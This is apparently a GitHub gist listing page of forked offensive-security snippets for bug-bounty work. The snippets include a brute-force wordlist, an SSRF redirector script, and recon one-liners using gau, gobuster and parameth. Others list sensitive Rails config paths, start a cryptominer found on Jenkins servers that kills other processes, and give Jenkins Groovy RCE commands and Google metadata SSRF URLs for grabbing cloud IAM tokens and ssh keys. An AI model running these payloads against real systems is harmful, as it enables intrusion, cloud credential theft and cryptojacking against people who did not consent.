Skip to content

Instantly share code, notes, and snippets.

View emadshanab's full-sized avatar
🏠
Working from home

Emad Shanab emadshanab

🏠
Working from home
626 followers · 272 following
View GitHub Profile
@emadshanab
emadshanab / doc.mkd
Created January 28, 2017 02:01 — forked from joannecheng/doc.mkd
Beyond the Bar Graph: Live coding example

Visualizing Rails Issues

Live coding demo from talk at Kod.io @ Linz 2014.

@emadshanab
emadshanab / wordlist.txt
Created May 28, 2020 10:36 — forked from random-robbie/wordlist.txt
bruteforce wordlist for bug bountys
This file has been truncated, but you can view the full file.
20-ev-allgemein
20-years
200
2000
20000719
2001
2001cc
2002
2003
2004
@emadshanab
emadshanab / ssrf-redirector.py
Created May 28, 2020 10:39 — forked from random-robbie/ssrf-redirector.py
#!/usr/bin/env python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
if len(sys.argv)-1 != 2:
print("""
Usage: {} <port_number> <url>
""".format(sys.argv[0]))
sys.exit()
@emadshanab
emadshanab / test
Created May 28, 2020 10:40 — forked from random-robbie/test
gau $1 | sort -u | grep -v oembed | grep -v .css | grep -v .jpg | grep -v .svg | grep -v .png | grep -v .gif | grep -v .ico | grep -v .mp4 | grep -v .eot | grep -v .webm | grep = | sed s/http\:/https\:/g | sed s/\:80//g |sort -u | tee leads.txt
@emadshanab
emadshanab / ruby-sensitive-files.txt
Created May 28, 2020 10:42 — forked from random-robbie/ruby-sensitive-files.txt
database.yml
database.yml_original
database.yml~
database.yml.pgsql
database.yml.sqlite3
config/database.yml
config/database.yml_original
config/database.yml~
config/database.yml.pgsql
config/database.yml.sqlite3
@emadshanab
emadshanab / start.sh
Created May 28, 2020 10:43 — forked from random-robbie/start.sh
cat urls.txt | while read url; do gobuster -u https://"$url" -q -e -k -w content_discovery_all.txt; done > sub_url.txt; cat sub_url.txt| cut -d ' ' -f 1 > /opt/parameth/params.txt;cd /opt/parameth;cat params.txt | while read url; do python /opt/parameth/parameth.py -u http://"$url"; done
@emadshanab
emadshanab / jenkins-miner.sh
Created May 28, 2020 10:45 — forked from random-robbie/jenkins-miner.sh
Miner found on jenkins servers.
#!/bin/bash
if [[ $(whoami) != "root" ]]; then
for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do
kill -9 $tr || : ;
done;
fi
threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
@emadshanab
emadshanab / jenkins.md
Created May 28, 2020 10:47 — forked from random-robbie/jenkins.md

Jenkins Groovy RCE Commands

AWS IAM ROLE KEYS

def command = "wget -q -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/"
 def proc = command.execute()
@emadshanab
emadshanab / Nmap
Created May 28, 2020 10:51 — forked from random-robbie/Nmap
Using nmap alongside searchsploit in Kali Linux to grab any low hanging fruit:
nmap -p- -sV -oX 71-new.xml 10.10.10.71; searchsploit --nmap 71-new.xml
This creates a xml file called 71-new.xml file, then reference the file using ; searchsploit --nmap 71-new.xml
chrisyoung.net
@emadshanab
emadshanab / google SSRF
Created May 28, 2020 10:58 — forked from random-robbie/google SSRF
http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json
http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json
http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json
http://metadata.google.internal/computeMetadata/v1beta1/project//attributes/ssh-keys
http://metadata.google.internal/computeMetadata/v1beta1/instance/hostname